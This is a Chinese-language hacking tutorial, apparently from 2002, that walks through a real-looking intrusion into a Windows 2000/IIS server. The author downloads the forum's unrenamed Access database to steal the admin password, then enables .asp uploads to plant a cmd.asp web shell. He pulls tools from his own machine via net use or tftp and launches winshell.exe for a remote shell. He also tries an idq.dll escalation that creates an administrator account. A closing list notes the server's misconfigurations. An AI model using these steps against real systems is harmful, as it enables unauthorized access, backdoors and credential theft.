使用網站出錯設置獲得完全控制權限

其實現在網上安全站點和學黑的站點太多了,參與進來的人

　　也越來越多,這些促使了許多網站和個人增強安全意識,是件大好事.

　　所以諸如ipc$弱口令,printer,IDQ遠程溢出,UNICODE,3389輸入法等漏洞

　　已經相比之下少了很多.這里我們來聊聊如何不用以上的漏洞,

　　來入侵一臺主機,加深一下對安全的理解.

　　某站點IP 61.61.13.13

　　開始:掃描端口,發現開放:80,135,139,1025

　　嘗試獲取IIS信息:

　　c:\tools>telnet 61.61.13.13 80

　　HTTP/1.1 400 Bad Request

　　Server: Microsoft-IIS/5.0

　　Date: Thu, 03 Jan 2002 19:26:59 GMT

　　Content-Type: text/html

　　Content-Length: 87

　　The parameter is incorrect.

　　遺失對主機的連接。

　　C:\tools>

　　//是IIS5,綜合以上信息基本判定為win2000服務器

　　嘗試獲取用戶列表:

　　C:\tools>letmein \\61.61.13.13 -all -d

　　stating connecting to server ......

　　//失敗!

　　嘗試掃描iis cgi漏洞

　　略.

　　//做了安全配置,沒有發現可利用之漏洞

　　接著開始瀏覽該站主頁,

　　主頁 http://61.61.13.13/index.htm

　　該網站很簡單,主頁采用html,沒有使用ASP

　　論壇 http://61.61.13.13/bbs/default.asp

　　發現該站點有一ASP論壇,論壇為快樂論壇系統(以下均隱去真名)功能較多,共享程序

　　猜:綜合端口掃描結果分析,此論壇應為ASP+ACCESS構建,因為在端口

　　掃描中沒有發現諸如1433 3306等端口.(當然不是絕對的)

　　現在我們要從論壇入手了.

　　怎么入手呢?

　　可能有些同志馬上就會開始測試%81,Translate:f.....

　　或猜文件名下載數據庫,

　　但我覺得在不了解前就先不要盲目的碰.

　　現在開始在網上找這個論壇的程序下載

　　靠,好多地方都沒有,

　　再搜...半小時后找到并下載.

　　呵呵~果然是用access

　　在自己的機器上裝好此論壇,好好研究一下

　　發現:數據庫名是fuck.mdb,在/data下,呵呵~

　　論壇有上傳功能,需要設置,管理員登陸程序是poweruser_in.asp

　　差不多了,可以看看運氣如何了.

　　http://61.61.13.13/bbs/data/fuck.mdb

　　暈倒!竟然沒改,可以下載,

　　4M多,一會就完了,拿access2000或myadmin.asp打開數據庫

　　順利拿到論壇管理帳號:play/1314520

　　再看看運氣,會不會論壇帳戶密碼和系統的一樣:

　　net use \\61.61.13.13\ipc$ "1314520" /user:"play"

　　net use \\61.61.13.13\ipc$ "1314520" /user:"administrator"

　　//運氣不好,都失敗.

　　現在登陸論壇管理頁,輸入用戶名及密碼登陸論壇管理,

　　熟練的找到上傳設置(為什么會熟練呢?因為已經了解)

　　將允許上傳的文件類型中加上.asp

　　知道要干什么了吧?對,上傳個ASP小程序(在瀏覽器中得到一個命令條,輸入命令后在瀏覽器中返回結果)

　　上傳cmd.asp到/upload下,好快,才1K多點,

　　好嘍~~,把剛才允許上傳的文件類型中的.ASP再刪掉,接著退出.

　　在瀏覽器中:

　　http://61.61.13.13/bbshttp://img6.22122511.com/upload/net_2/cmd.asp

　　出來了,呵呵~,收集點信息先:

　　dir c:\ d:\ e:\

　　net user

　　net start

　　net view

　　netstat -an

　　arp -a

　　...... //呵呵~~了解的差不多了

　　對了,試試at命令:

　　AT

　　拒絕訪問。

　　倒,權限實在小的可憐啊!現在是需要提升權限了,

　　那就要上傳文件,又到論壇里傳???不用了,

　　雖然權限小,但還是有兩種快捷的方法上傳文件

　　1. net use \\myIP\c$ "mypass" /user:"myname"

　　2. tftp -i myIP get filename

　　明白了吧?我選第一種方法上傳文件

　　先建立連接: net use \\myIP\c$ "mypass" /user:"myname" 命令成功完成

　　現在是不能直接copy文件到當前目錄的,

　　因為當前默認路徑是\winnt\system32,我們的權限小,這個目錄我們是沒有權限寫的.

　　(具體中,你可以使用cacls命令查看對文件的權限)

　　那就建個目錄先吧,建到d:\downloads下吧,那個目錄我們有權限寫:

　　md d:\downloads\winzip32 //呵呵~這名字不錯.

　　先COPY個winshell.exe吧,開個telnet端口,命令行下總比在瀏覽器里方便啊.

　　copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已復制一個文件

　　啟動它 d:\downloads\winzip32\winshell.exe 瀏覽器窗口會停好久,

　　不用等的,程序已經啟動了,點停止,接著,

　　斷開共享連接: net use \\myIP\c$ /del 完成

　　離開瀏覽器,打開命令行窗口

　　telnet 61.61.13.13 5277

　　WinShell v2.0 by janker@peckerland.com - '!' to end, 'Enter' to shell...

　　* d:\downloads\winzip32\winshell.exe

　　Microsoft Windows 2000 [Version 5.00.2195]

　　(C) 版權所有 1985-1998 Microsoft Corp.

　　c:\winnt\system32>

　　//成功得到一個shell

　　我們現在的權限很小,許多目錄都不能訪問或寫,所以我們要想辦法提高權限,

　　(個人認為如果是FAT32分區的話,可能會好辦些,但NTFS,太麻煩)

　　這一步比較難,我試了很多方法都不成功.

　　比如:

　　使用netdde.exe pipeupadmin.exe 不行

　　上傳了冰河6.0J,可以連接,但權限依然很小

　　而且你的木馬和后門程序在對方重起后就不能用了

　　原因可能是權限小,無法創建服務或修改注冊表,來實現開機自動啟動.

　　在試驗中,唯一覺得可行的是這樣:(我運氣!!!實際中我很少成功)

　　1.上傳idq.dll到對方WEB目錄里的可執行目錄

　　2.用ispc 61.6.13.13/XXXX/idq.dll 連接上,得到system權限

　　3.或單獨運行idq.dll,獲得一個管理員組的用戶"iisuser" 密碼:"abcd1234"

　　http://61.61.13.13/XXXX/idq.dll

　　There will add a Administrators User "iisuser",Its Password is "abcd1234".If you want to enter cmd.exe shell,please use ispc.exe.

　　但這樣一樣存在問題,這個可執行的目錄必須是"腳本和可執行程序"的配置

　　單單是"純腳本"不行的.

　　不知道誰還有更好的成功辦法和思路.

　　以上不難看出管理員的配置錯誤:

　　1.安裝BBS后對數據庫文件沒有更改文件名或后綴

　　2.沒有禁止或更改對FileSystemObject對象的調用

　　3.WEB目錄沒有禁止對"everyone"的完全控制

　　4.對沒有必要使用的WEB目錄使用了"腳本和可執行程序"的配置

　　可喜的是犯這些錯誤的人是越來越少了!這樣也促使我們可以學習新的入侵方法.

　　個人理解,難免有錯,請您指正.